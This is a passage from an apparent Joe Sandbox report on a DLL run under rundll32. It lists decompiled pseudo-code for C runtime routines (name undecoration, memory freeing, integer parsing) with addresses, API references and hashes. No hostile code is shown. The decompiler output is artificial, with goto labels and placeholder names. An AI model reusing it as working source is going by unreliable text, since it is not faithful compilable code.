						__eflags = _t181 - 0x4d;
						if(_t181 > 0x4d) {
							goto L60;
						}
						_v32 = "__int128";
						goto L42;
					}
					__eflags = _t181 - 0x46;
					if(_t181 >= 0x46) {
						_v32 = "__int16";
						goto L37;
					}
					__eflags = _t181;
					if(_t181 == 0) {
						_t213 =  &_v16;
						 *0x1004e004 = _t228;
						E10007596( &_v16, 1);
						goto L27;
					}
					__eflags = _t181 - 0x24;
					if(_t181 == 0x24) {
						_v32 = "__w64 ";
						_v28 = 6;
						E10007615(_t226, _a4,  &_v32, E10008D42( &_v24, _a8));
						goto L93;
					}
					__eflags = _t181 + 0xffffffbc - 1;
					if(_t181 + 0xffffffbc > 1) {
						goto L60;
					} else {
						_v32 = "__int8";
						_v28 = 6;
						goto L26;
					}
				}
				if(_t244 == 0) {
					goto L79;
				}
				_t6 = _t203 - 0x43; // -67
				_t197 = _t6;
				if(_t197 > 0xa) {
					goto L76;
				}
				_t7 = _t197 + 0x1000922a; // 0x8bffffe5
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M10009212))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t213 =  &_v16;
						E10007500( &_v16,  &_v32);
						goto L80;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						goto L76;
				}
			}

0x10008d45
0x10008d4d
0x10008d53
0x10009202
0x1000920a
0x1000920a
0x1000920d
0x10009210
0x10009210
0x10008d59
0x10008d5d
0x10008d5d
0x10008d60
0x10008d64
0x10008d67
0x10008d6f
0x10008d70
0x10008d73
0x10008e00
0x10008e03
0x10009133
0x1000913e
0x10009145
0x1000914a
0x1000914d
0x10009155
0x10009158
0x1000915f
0x10009164
0x10009164
0x10009166
0x10009169
0x10009195
0x1000919c
0x100091a3
0x100091b7
0x100091b9
0x100091c1
0x100091c7
0x100091ca
0x100091ca
0x100091d0
0x100091e5
0x100091e5
0x100091ea
0x100091f0
0x100091f5
0x00000000
0x100091f5
0x1000916b
0x1000916d
0x10008eae
0x10008eae
0x10008eb5
0x00000000
0x10008eb5
0x10009173
0x10009175
0x00000000
0x00000000
0x1000917b
0x1000917d
0x00000000
0x00000000
0x10009183
0x10009185
0x00000000
0x00000000
0x1000918e
0x00000000
0x00000000
0x10008e92
0x10008e95
0x10008e98
0x00000000
0x00000000
0x10008e9a
0x10008e9c
0x00000000
0x00000000
0x10008e9e
0x10008ea0
0x00000000
0x00000000
0x10008ea2
0x10008ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x10008ea4
0x10008e09
0x1000910a
0x1000910d
0x10009116
0x1000911c
0x1000911e
0x10009121
0x10009124
0x10009127
0x10009129
0x00000000
0x00000000
0x10008fdc
0x10008fdc
0x10008fdf
0x10008fe1
0x00000000
0x10008fe1
0x10008e0f
0x10008e12
0x10009020
0x10009020
0x10009023
0x10009023
0x10009026
0x1000902a
0x1000902e
0x10009030
0x10009033
0x10009036
0x10009039
0x1000903c
0x1000908a
0x1000908c
0x10009090
0x10009093
0x10009096
0x100090d2
0x100090d4
0x100090d9
0x100090e4
0x100090eb
0x100090eb
0x10009098
0x1000909b
0x100090a6
0x100090ad
0x100090b2
0x100090b4
0x100090b9
0x100090c4
0x100090cb
0x100090cb
0x100090b4
0x10009096
0x100090fd
0x00000000
0x10009102
0x10009045
0x10009056
0x1000905b
0x10009061
0x10009063
0x10009068
0x10009073
0x1000907a
0x1000907f
0x1000907f
0x10009082
0x00000000
0x10009082
0x10008e18
0x10008e1b
0x1000900d
0x10009014
0x10008def
0x10008df3
0x10008df6
0x00000000
0x10008df6
0x10008e21
0x10008e24
0x00000000
0x00000000
0x10008e2a
0x10008e2c
0x10008e2c
0x10008e2f
0x10008e32
0x10008e35
0x10008e3b
0x10008e3e
0x10008f60
0x10008f63
0x10008fa5
0x10008fa8
0x10009001
0x10008f2f
0x10008f2f
0x10008e83
0x10008e87
0x10008e8a
0x10008e8f
0x10008e8f
0x00000000
0x10008e8f
0x10008faa
0x10008fad
0x10008ff5
0x10008f09
0x10008f09
0x00000000
0x10008f09
0x10008fb2
0x10008fb5
0x10008fe9
0x10008fe9
0x00000000
0x10008fe9
0x10008fb7
0x10008fba
0x10008fc3
0x10008fc9
0x10008fcb
0x10008fce
0x10008fd1
0x10008fd4
0x10008fd6
0x00000000
0x00000000
0x00000000
0x10008fd6
0x10008f65
0x10008f9c
0x00000000
0x10008f9c
0x10008f67
0x10008f67
0x10008f6a
0x10008f96
0x00000000
0x10008f96
0x10008f6c
0x10008f6c
0x10008f6e
0x10008f88
0x00000000
0x10008f88
0x10008f70
0x10008f73
0x00000000
0x00000000
0x10008f75
0x10008f7c
0x00000000
0x10008f7c
0x10008e44
0x10008f4d
0x10008f54
0x00000000
0x10008f54
0x10008e4a
0x10008e4d
0x10008f15
0x10008f18
0x10008f44
0x00000000
0x10008f44
0x10008f1a
0x10008f1d
0x10008f3b
0x00000000
0x10008f3b
0x10008f1f
0x10008f22
0x00000000
0x00000000
0x10008f28
0x00000000
0x10008f28
0x10008e53
0x10008e56
0x10008f02
0x00000000
0x10008f02
0x10008e5c
0x10008e5e
0x10008ef2
0x10008ef5
0x10008efb
0x00000000
0x10008efb
0x10008e64
0x10008e67
0x10008ec7
0x10008ecf
0x10008ee3
0x00000000
0x10008ee8
0x10008e6c
0x10008e6f
0x00000000
0x10008e75
0x10008e75
0x10008e7c
0x00000000
0x10008e7c
0x10008e6f
0x10008d79
0x00000000
0x00000000
0x10008d7f
0x10008d7f
0x10008d85
0x00000000
0x00000000
0x10008d8b
0x10008d92
0x00000000
0x10008d99
0x00000000
0x00000000
0x10008db8
0x10008dbf
0x00000000
0x00000000
0x10008dc8
0x10008dcf
0x00000000
0x00000000
0x10008dd8
0x10008da0
0x10008da0
0x10008da7
0x10008dab
0x10008dae
0x00000000
0x00000000
0x10008de1
0x10008de8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

shared_ptr.LIBCMT ref: 10008DAE
shared_ptr.LIBCMT ref: 10008DF6
shared_ptr.LIBCMT ref: 10008E8A
operator+.LIBVCRUNTIME ref: 10008EE3
DName::operator=.LIBVCRUNTIME ref: 10008EFB
shared_ptr.LIBCMT ref: 10009145
DName::operator+.LIBCMT ref: 100091B9
operator+.LIBVCRUNTIME ref: 10009202

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: 3f0597f9030ab65205f9ced627fb8c410918e4c165c87269fa6c19fcfb40e6f4
Instruction ID: b28e2a1fd94149dd2561a11b9f82f89739496a4781773dc4ca3130be31d5303b
Opcode Fuzzy Hash: 3f0597f9030ab65205f9ced627fb8c410918e4c165c87269fa6c19fcfb40e6f4
Instruction Fuzzy Hash: 1CD18FB1D0424BDFEB00CF90C885AEEBBB4FB04380F60816AD955A7289D7799B45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1000C2ED, Relevance: 15.2, APIs: 10, Instructions: 250
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E1000C2ED(void* __edx, signed int* _a4) {
				signed int _v8;
				long _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				intOrPtr* _t63;
				char* _t64;
				signed int _t72;
				signed int _t78;
				signed int _t84;
				signed int _t85;
				signed int _t89;
				signed int _t124;
				signed int _t126;
				void* _t129;
				signed int* _t164;
				signed int _t165;
				signed int _t166;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				void* _t176;

				_t163 = __edx;
				_t61 =  *0x1004d054; // 0x944e5696
				_v8 = _t61 ^ _t173;
				_t63 =  *0x1004e004; // 0x0
				_t124 =  *_t63;
				_t64 = _t63 + 1;
				_t164 = _a4;
				_t165 = _t124;
				 *0x1004e004 = _t64;
				_v28 = _t165;
				_t176 = _t124 - 0x45;
				if(_t176 > 0) {
					__eflags = _t124 - 0x52;
					if(__eflags > 0) {
						__eflags = _t124 - 0x53;
						if(_t124 == 0x53) {
							 *_t164 =  *_t164 & 0x00000000;
							_t58 =  &(_t164[1]);
							 *_t58 = _t164[1] & 0x00000000;
							__eflags =  *_t58;
							L53:
							return E100037EA(_t164, _v8 ^ _t173, _t163);
						}
						__eflags = _t124 - 0x54 - 2;
						if(_t124 - 0x54 > 2) {
							L51:
							_t164[1] = _t164[1] & 0x00000000;
							 *_t164 =  *_t164 & 0x00000000;
							_t164[1] = 2;
							goto L53;
						}
						L38:
						E1000BC98(_t163,  &_v40);
						E1000BD27( &_v40,  &_v24, 0x10);
						_t72 = E10010036( &_v40,  &_v24);
						__eflags =  *0x1004e00c & 0x00004000;
						_t166 = _t72;
						if(( *0x1004e00c & 0x00004000) == 0) {
							L42:
							swprintf( &_v24, 0x10, "%d", _t166 & 0x00000fff);
							_v36 = 0;
							_push(_v36);
							E10006DC1( &_v40,  &_v24);
							_t78 = _v28 - 0x52;
							__eflags = _t78;
							if(_t78 == 0) {
								L50:
								_v32 = "`template-type-parameter-";
								L49:
								_v28 = 0x19;
								L47:
								E100076A6(E1000723E( &_v48,  &_v32),  &_v32,  &_v40);
								_push(0x27);
								L35:
								_push(_t164);
								E100076C8( &_v32);
								goto L53;
							}
							_t84 = _t78;
							__eflags = _t84;
							if(_t84 == 0) {
								goto L50;
							}
							_t85 = _t84 - 1;
							__eflags = _t85;
							if(_t85 == 0) {
								_v32 = "`generic-class-parameter-";
								goto L49;
							}
							__eflags = _t85 != 1;
							if(_t85 != 1) {
								goto L51;
							}
							_v32 = "`generic-method-parameter-";
							_v28 = 0x1a;
							goto L47;
						}
						_t126 =  *0x1004e014; // 0x0
						__eflags = _t126;
						if(_t126 == 0) {
							goto L42;
						}
						 *0x1004223c(_t72 & 0x00000fff);
						_t89 =  *_t126();
						__eflags = _t89;
						if(_t89 == 0) {
							goto L42;
						}
						_v36 = 0;
						_push(_v36);
						E10006E34(_t164, _t89);
						goto L53;
					}
					if(__eflags == 0) {
						goto L38;
					}
					__eflags = _t124 - 0x4a;
					if(_t124 <= 0x4a) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E10008798( &_v32, 0x7b);
						_t127 = _t124 - 0x48;
						__eflags = _t124 - 0x48 - 2;
						if(__eflags <= 0) {
							_push( &_v40);
							E100077A0( &_v32, L10009B9E(_t127,  &_v32, __edx, _t164, _t165, __eflags));
							E100077F7( &_v32, 0x2c);
						}
						_t168 = _t165 - 0x46;
						__eflags = _t168;
						if(_t168 == 0) {
							L32:
							E100077A0( &_v32, E1000BC98(_t163,  &_v40));
							E100077F7( &_v32, 0x2c);
							goto L33;
						} else {
							_t169 = _t168 - 1;
							__eflags = _t169;
							if(_t169 == 0) {
								L31:
								E100077A0( &_v32, E1000BC98(_t163,  &_v40));
								E100077F7( &_v32, 0x2c);
								goto L32;
							}
							_t170 = _t169 - 1;
							__eflags = _t170;
							if(_t170 == 0) {
								L33:
								E100077A0( &_v32, E1000BC98(_t163,  &_v40));
								L34:
								_push(0x7d);
								goto L35;
							}
							_t171 = _t170 - 1;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L32;
							}
							__eflags = _t171 != 1;
							if(_t171 != 1) {
								goto L34;
							}
							goto L31;
						}
					}
					__eflags = _t124 - 0x4d;
					if(_t124 != 0x4d) {
						goto L51;
					}
					E1000C5F3(_t124, __edx, _t165,  &_v32);
					E1000C2ED(__edx, _t164);
					L9:
					L10:
					goto L53;
				}
				if(_t176 == 0) {
					_push(_t164);
					L10009B9E(_t124, _t129, __edx, _t164, _t165, __eflags);
					goto L10;
				}
				if(_t124 == 0) {
					 *0x1004e004 = _t64 - 1;
					E100072DE(_t164, 1);
					goto L53;
				}
				if(_t124 == 0x30) {
					E1000BC98(__edx, _t164);
					goto L10;
				}
				if(_t124 == 0x31) {
					__eflags =  *_t64 - 0x40;
					if( *_t64 != 0x40) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E10008798( &_v32, 0x26);
						_push( &_v40);
						E100076A6( &_v32, _t164, L10009B9E(_t124,  &_v32, __edx, _t164, _t165, __eflags));
					} else {
						_v32 = "NULL";
						 *0x1004e004 = _t64 + 1;
						_v28 = 4;
						E1000723E(_t164,  &_v32);
					}
					goto L53;
				}
				if(_t124 == 0x32) {
					E1000CC65(_t124, __edx, _t165, _t164);
					goto L10;
				}
				if(_t124 == 0x34) {
					E1000BF31(_t164);
					goto L10;
				}
				if(_t124 - 0x41 > 1) {
					goto L51;
				}
				E1000A460(__edx, _t164, _t165);
				goto L9;
			}

0x1000c2ed
0x1000c2f3
0x1000c2fa
0x1000c2fd
0x1000c305
0x1000c307
0x1000c308
0x1000c30b
0x1000c30e
0x1000c313
0x1000c316
0x1000c319
0x1000c3ea
0x1000c3ed
0x1000c4c8
0x1000c4cb
0x1000c5db
0x1000c5de
0x1000c5de
0x1000c5de
0x1000c5e2
0x1000c5f2
0x1000c5f2
0x1000c4d4
0x1000c4d7
0x1000c5ce
0x1000c5ce
0x1000c5d2
0x1000c5d5
0x00000000
0x1000c5d5
0x1000c4dd
0x1000c4e1
0x1000c4f0
0x1000c4f9
0x1000c4fe
0x1000c508
0x1000c50b
0x1000c540
0x1000c552
0x1000c55a
0x1000c564
0x1000c568
0x1000c570
0x1000c570
0x1000c573
0x1000c5c5
0x1000c5c5
0x1000c5bc
0x1000c5bc
0x1000c593
0x1000c5a9
0x1000c5ae
0x1000c4ba
0x1000c4ba
0x1000c4be
0x00000000
0x1000c4be
0x1000c576
0x1000c576
0x1000c579
0x00000000
0x00000000
0x1000c57b
0x1000c57b
0x1000c57e
0x1000c5b5
0x00000000
0x1000c5b5
0x1000c580
0x1000c583
0x00000000
0x00000000
0x1000c585
0x1000c58c
0x00000000
0x1000c58c
0x1000c50d
0x1000c513
0x1000c515
0x00000000
0x00000000
0x1000c51f
0x1000c525
0x1000c528
0x1000c52a
0x00000000
0x00000000
0x1000c52c
0x1000c532
0x1000c536
0x00000000
0x1000c536
0x1000c3f3
0x00000000
0x00000000
0x1000c3f9
0x1000c3fc
0x1000c41b
0x1000c422
0x1000c428
0x1000c42d
0x1000c430
0x1000c433
0x1000c438
0x1000c443
0x1000c44d
0x1000c44d
0x1000c452
0x1000c452
0x1000c455
0x1000c488
0x1000c496
0x1000c4a0
0x00000000
0x1000c457
0x1000c457
0x1000c457
0x1000c45a
0x1000c46b
0x1000c479
0x1000c483
0x00000000
0x1000c483
0x1000c45c
0x1000c45c
0x1000c45f
0x1000c4a5
0x1000c4b3
0x1000c4b8
0x1000c4b8
0x00000000
0x1000c4b8
0x1000c461
0x1000c461
0x1000c464
0x00000000
0x00000000
0x1000c466
0x1000c469
0x00000000
0x00000000
0x00000000
0x1000c469
0x1000c455
0x1000c3fe
0x1000c401
0x00000000
0x00000000
0x1000c40b
0x1000c411
0x1000c358
0x1000c359
0x00000000
0x1000c359
0x1000c31f
0x1000c3df
0x1000c3e0
0x00000000
0x1000c3e0
0x1000c327
0x1000c3d0
0x1000c3d5
0x00000000
0x1000c3d5
0x1000c330
0x1000c3c4
0x00000000
0x1000c3c4
0x1000c339
0x1000c36f
0x1000c372
0x1000c398
0x1000c39f
0x1000c3a5
0x1000c3ad
0x1000c3b9
0x1000c374
0x1000c375
0x1000c37c
0x1000c386
0x1000c38e
0x1000c38e
0x00000000
0x1000c372
0x1000c33e
0x1000c368
0x00000000
0x1000c368
0x1000c343
0x1000c360
0x00000000
0x1000c360
0x1000c34b
0x00000000
0x00000000
0x1000c353
0x00000000

APIs

DName::operator+.LIBCMT ref: 1000C3B9
UnDecorator::getSignedDimension.LIBCMT ref: 1000C3C4
DName::DName.LIBVCRUNTIME ref: 1000C3D5
UnDecorator::getSignedDimension.LIBCMT ref: 1000C46F
UnDecorator::getSignedDimension.LIBCMT ref: 1000C48C
UnDecorator::getSignedDimension.LIBCMT ref: 1000C4A9
DName::operator+.LIBCMT ref: 1000C4BE
UnDecorator::getSignedDimension.LIBCMT ref: 1000C4E1
swprintf.LIBCMT ref: 1000C552
DName::operator+.LIBCMT ref: 1000C5A9

Part of subcall function 1000A460: DName::DName.LIBVCRUNTIME ref: 1000A484

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
Opcode ID: 3870ca652ee5dd46192f954932dcdd9a1671f71589c666b9744f5de558d7014f
Instruction ID: f9c83e7f69799ed626e93f8569c8994f1034e48759f8977a8353ac719b3bb837
Opcode Fuzzy Hash: 3870ca652ee5dd46192f954932dcdd9a1671f71589c666b9744f5de558d7014f
Instruction Fuzzy Hash: 62819376D1070D9AFB14CBA0CD96FFE77B8EB053C1F60401AE506A2089DB78BA44C795

Uniqueness

Uniqueness Score: -1.00%

Function 10023CFC, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E10023CFC(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x100439f8;
				if(_t67 != 0x100439f8) {
					E100268B3(_t67);
					_t36 = _a4;
				}
				E100268B3( *((intOrPtr*)(_t36 + 0x3c)));
				E100268B3( *((intOrPtr*)(_a4 + 0x30)));
				E100268B3( *((intOrPtr*)(_a4 + 0x34)));
				E100268B3( *((intOrPtr*)(_a4 + 0x38)));
				E100268B3( *((intOrPtr*)(_a4 + 0x28)));
				E100268B3( *((intOrPtr*)(_a4 + 0x2c)));
				E100268B3( *((intOrPtr*)(_a4 + 0x40)));
				E100268B3( *((intOrPtr*)(_a4 + 0x44)));
				E100268B3( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E100238C6(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E10023931(_t71, _t75);
			}

0x10023cfc
0x10023d01
0x10023d07
0x10023d09
0x10023d0f
0x10023d12
0x10023d17
0x10023d1a
0x10023d1e
0x10023d29
0x10023d34
0x10023d3f
0x10023d4a
0x10023d55
0x10023d60
0x10023d6b
0x10023d79
0x10023d84
0x10023d8c
0x10023d8d
0x10023d90
0x10023d96
0x10023d9a
0x10023d9e
0x10023d9f
0x10023da9
0x10023daf
0x10023db0
0x10023db3
0x10023db9
0x10023dbd
0x10023dc1
0x10023dc8

APIs

_free.LIBCMT ref: 10023D12

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 10023D1E
_free.LIBCMT ref: 10023D29
_free.LIBCMT ref: 10023D34
_free.LIBCMT ref: 10023D3F
_free.LIBCMT ref: 10023D4A
_free.LIBCMT ref: 10023D55
_free.LIBCMT ref: 10023D60
_free.LIBCMT ref: 10023D6B
_free.LIBCMT ref: 10023D79

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 46643b81a24f0458ed114faaef335da02fc76548a0a77645ebc19370622f552b
Instruction ID: 02d10424f483025c11247d9988229feb7d6f071447483585f46ce33aa515a283
Opcode Fuzzy Hash: 46643b81a24f0458ed114faaef335da02fc76548a0a77645ebc19370622f552b
Instruction Fuzzy Hash: 0A21947AD04108AFDB41DFA4D981DDE7BB9EF08244F4086A6F515DB222DB71EA448FC0

Uniqueness

Uniqueness Score: -1.00%

Function 1000EFDF, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1000EFDF(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed short* _v156;
				signed short* _v160;
				signed int _v164;
				intOrPtr _v168;
				signed short* _v172;
				char _v176;
				char _v188;
				signed short* _t176;
				signed int _t177;
				signed int _t178;
				signed short* _t179;
				signed int _t180;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				void* _t187;
				signed char _t189;
				signed int _t193;
				signed int _t194;
				signed int _t196;
				void* _t199;
				intOrPtr _t200;
				signed int _t208;
				signed int _t209;
				signed short* _t211;
				signed int _t212;
				signed int _t214;
				intOrPtr _t219;
				void* _t220;
				signed short* _t221;
				signed int _t222;
				signed short* _t223;
				intOrPtr _t224;
				void* _t228;
				signed short* _t230;
				signed int _t232;
				signed short* _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed short* _t240;
				intOrPtr* _t244;
				signed short _t245;

				if(E1000FB5A( &_a8) == 0) {
					L5:
					_t235 = 0;
					_t208 = 0;
					L6:
					_t244 = _a12;
					if(_t244 != 0) {
						 *_t244 = _a8;
					}
					return _t235;
				}
				_t209 = _a16;
				_t236 = 2;
				if(_t209 == 0) {
					L9:
					_t217 =  &_v188;
					E1000F794( &_v188, _t228, _a4);
					_v12 = 0;
					_v20 = 0;
					_t176 = _a8;
					_v172 = _t176;
					_t245 =  *_t176 & 0x0000ffff;
					_t177 =  &(_t176[1]);
					L11:
					_a8 = _t177;
					_t178 = E100242A0(_t217, _t245, 8);
					_pop(_t217);
					__eflags = _t178;
					if(_t178 != 0) {
						_t179 = _a8;
						_t245 =  *_t179 & 0x0000ffff;
						_t177 = _t179 + _t236;
						__eflags = _t177;
						goto L11;
					}
					_t180 = _a20 & 0x000000ff;
					_v8 = _t180;
					__eflags = _t245 - 0x2d;
					if(_t245 != 0x2d) {
						__eflags = _t245 - 0x2b;
						if(_t245 != 0x2b) {
							_t230 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v8 = _t180 | _t236;
						L15:
						_t234 = _a8;
						_t245 =  *_t234 & 0x0000ffff;
						_t230 = _t234 + _t236;
						_a8 = _t230;
						L17:
						_v16 = 0x3a;
						_t219 = 0xff10;
						_v148 = 0x66a;
						_v24 = 0x6f0;
						_v28 = 0x6fa;
						_v32 = 0x966;
						_v36 = 0x970;
						_v40 = 0x9e6;
						_v44 = 0x9f0;
						_v48 = 0xa66;
						_v52 = 0xa70;
						_v56 = 0xae6;
						_v60 = 0xaf0;
						_v64 = 0xb66;
						_v68 = 0xb70;
						_v72 = 0xc66;
						_v76 = 0xc70;
						_v80 = 0xce6;
						_v84 = 0xcf0;
						_v88 = 0xd66;
						_v92 = 0xd70;
						_v96 = 0xe50;
						_v100 = 0xe5a;
						_v104 = 0xed0;
						_v108 = 0xeda;
						_v112 = 0xf20;
						_v116 = 0xf2a;
						_v120 = 0x1040;
						_v124 = 0x104a;
						_v128 = 0x17e0;
						_v132 = 0x17ea;
						_v136 = 0x1810;
						_v140 = 0x181a;
						_v144 = 0xff1a;
						_t237 = 0x30;
						__eflags = _t209;
						if(_t209 == 0) {
							L19:
							__eflags = _t245 - _t237;
							if(_t245 < _t237) {
								L61:
								_t182 = _t245 & 0x0000ffff;
								__eflags = _t182 - 0x41;
								if(_t182 < 0x41) {
									L64:
									_t86 = _t182 - 0x61; // 0x5ff
									_t220 = _t86;
									__eflags = _t220 - 0x19;
									if(_t220 > 0x19) {
										_t183 = _t182 | 0xffffffff;
										__eflags = _t183;
										L69:
										__eflags = _t183;
										if(_t183 == 0) {
											_t184 =  *_t230 & 0x0000ffff;
											_t221 =  &(_t230[1]);
											_a8 = _t221;
											__eflags = _t184 - 0x78;
											if(_t184 == 0x78) {
												L77:
												__eflags = _t209;
												if(_t209 == 0) {
													_t209 = 0x10;
													_a16 = _t209;
												}
												_t245 =  *_t221 & 0x0000ffff;
												_t222 =  &(_t221[1]);
												__eflags = _t222;
												_a8 = _t222;
												L80:
												_t185 = _t209;
												asm("cdq");
												_push(_t209);
												_t223 = _t230;
												_v164 = _t209;
												_v160 = _t223;
												_t186 = E1003F7B0(0xffffffff, 0xffffffff, _t185, _t223);
												_v152 = _t209;
												_v156 = _t223;
												_t211 = _t230;
												_t224 = _t186;
												_v16 = _t211;
												_v168 = _t224;
												while(1) {
													__eflags = _t245 - _t237;
													if(_t245 < _t237) {
														goto L122;
													}
													_t199 = 0x3a;
													__eflags = _t245 - _t199;
													if(_t245 >= _t199) {
														_t200 = 0xff10;
														__eflags = _t245 - 0xff10;
														if(_t245 >= 0xff10) {
															__eflags = _t245 - _v144;
															if(_t245 < _v144) {
																L87:
																_t239 = (_t245 & 0x0000ffff) - _t200;
																L121:
																__eflags = _t239 - 0xffffffff;
																if(_t239 != 0xffffffff) {
																	L130:
																	__eflags = _t239 - 0xffffffff;
																	if(_t239 == 0xffffffff) {
																		L144:
																		E1000FB11( &_a8, _t245);
																		_t189 = _v8;
																		__eflags = _t189 & 0x00000008;
																		if((_t189 & 0x00000008) != 0) {
																			_t208 = _v20;
																			_t235 = _v12;
																			__eflags = E1000E497(_t189, _t235, _t208);
																			if(__eflags == 0) {
																				__eflags = _v8 & 0x00000002;
																				if((_v8 & 0x00000002) != 0) {
																					_t235 =  ~_t235;
																					asm("adc ebx, 0x0");
																					_t208 =  ~_t208;
																				}
																				L155:
																				__eflags = _v176;
																				if(_v176 != 0) {
																					 *(_v188 + 0x350) =  *(_v188 + 0x350) & 0xfffffffd;
																				}
																				goto L6;
																			}
																			 *((intOrPtr*)(E1002449E(__eflags))) = 0x22;
																			_t193 = _v8;
																			__eflags = _t193 & 0x00000001;
																			if((_t193 & 0x00000001) != 0) {
																				__eflags = _t193 & 0x00000002;
																				if((_t193 & 0x00000002) == 0) {
																					_t194 = _t193 | 0xffffffff;
																					__eflags = _t194;
																					_t208 = 0x7fffffff;
																				} else {
																					_t194 = 0;
																					_t208 = 0x80000000;
																				}
																				L152:
																				_t235 = _t194;
																				goto L155;
																			}
																			_t235 = _t235 | 0xffffffff;
																			_t208 = _t208 | 0xffffffff;
																			goto L155;
																		}
																		_a8 = _v172;
																		_t194 = 0;
																		_t208 = 0;
																		goto L152;
																	}
																	__eflags = _t239 - _a16;
																	if(_t239 >= _a16) {
																		goto L144;
																	}
																	_t196 = _v20;
																	_t232 = _v8 | 0x00000008;
																	__eflags = _t196 - _t211;
																	_v8 = _t232;
																	_t212 = _v12;
																	if(__eflags < 0) {
																		L141:
																		__eflags = 0;
																		L142:
																		_t214 = E1003F850(_v164, _v160, _t212, _t196) + _t239;
																		__eflags = _t214;
																		_v12 = _t214;
																		asm("adc eax, esi");
																		_v20 = _t232;
																		L143:
																		_t240 = _a8;
																		_t224 = _v168;
																		_t211 = _v16;
																		_t245 =  *_t240 & 0x0000ffff;
																		_a8 =  &(_t240[1]);
																		_t237 = 0x30;
																		continue;
																	}
																	if(__eflags > 0) {
																		L135:
																		__eflags = _t212 - _t224;
																		if(_t212 != _t224) {
																			L140:
